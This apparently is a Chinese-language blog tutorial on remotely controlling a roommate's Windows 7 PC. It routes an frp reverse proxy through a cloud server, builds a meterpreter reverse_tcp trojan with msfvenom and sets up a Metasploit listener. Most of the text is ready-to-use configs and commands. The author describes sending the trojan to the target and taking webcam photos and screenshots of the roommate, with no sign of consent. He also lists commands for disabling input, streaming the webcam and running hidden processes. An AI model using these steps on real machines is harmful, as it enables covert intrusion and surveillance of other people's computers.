實驗環境:
阿里雲ECS一台:x.x.x.x
內網kali控制端:192.168.2.104
外網win7主機:
前言
我在家,我室友在學校,在兩個完全不同的局域網,我想穿過公網實現遠控他的電腦,我上篇文章寫過局域網下kali控制win7,想想,黑客都和肉雞在一個局域網了,要是遇見高手了還怕抓不住你?,自己琢磨了很久,想到我前面剛好做過frp內網穿透,由於frp是一個高效反向代理和內網穿透的軟件,剛好配合kali的metsploit 做真正的遠控,想想就覺得牛逼,哈哈,只是自己的猜想,網上找資料沒找到,所以自己動手了。
場景描述
操作步驟:
由於上篇文章寫過搭建frp,所以這里不詳細寫,很簡單的,直接給配置文件,不會frp請看:https://blog.csdn.net/qq_38228830/article/details/85722385
1、阿里雲主機上啟動frps
配置文件如下:
vim frps.ini
frp服務端與客戶端連接端口,frps和frpc必須一致
bind_port = 7000
下面配置可以不寫,個人意願
儀表盤端口,只有設置了才能使用儀表盤(即后台)
dashboard_port = 7500
儀表盤訪問的用戶名密碼,如果不設置,則默認都是 admin
dashboard_user = admin
dashboard_pwd = admin
啟動frps:./frps. -c ./frps.ini
2、 kali啟動frpc:
配置文件如下:
vim frpc.ini
[common]
server_addr = 你的雲主機ip
server_port = 7000 #frpc工作端口,必須和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的5555
remote_port = 6000 #服務端用6000端口轉發給本機
啟動frpc: ./frpc -c ./frpc.ini
這時服務端有顯示了:
到此frp反向代理+內網穿透做完,下面開始木馬程序制作與監聽控制。
3、msfvenom制作Windows木馬程序:關鍵步驟
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公網ip lport=6000 -f exe x>Xaly.exe
lhost:必需設置為你的公網ip
lport:設置你在frpc.ini的remote_port = 6000
只有通過服務器的6000端口數據包才能成功轉發到我們的kali上來,這也是為什么要用frp反向代理原因。
制作好后將xaly.exe發送到目標Windows上
4、開始監聽:關鍵步驟
在kali中
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 127.0.0.1 #設置監聽ip,必須和frpc中的local_ip 一致
lhost => 127.0.0.1
msf exploit(multi/handler) > set lport 5555 #設置監聽端口,與frpc中的local_port一致
lport =>5555
msf exploit(multi/handler) > exploit
開始測試
Windows端運行木馬,
先觀察我們阿里雲的frp服務端情況
再觀察kali監控情況:
表示獲得了win7的控制權了,下面測試命令
webcan_snap 利用攝像頭拍照
我室友照片
截取他的win7桌面
screenshot
其他命令:
uictl開關鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/鼠標
uictl disable mouse #禁用鼠標
uictl disable keyboard #禁用鍵盤
webcam攝像頭命令
webcam_list #查看攝像頭
webcam_snap #通過攝像頭拍照
webcam_stream #通過攝像頭開啟視頻
execute執行文件
execute #在目標機中執行文件
execute -H -i -f cmd.exe # 創建新進程cmd.exe,-H不可見,-i交互
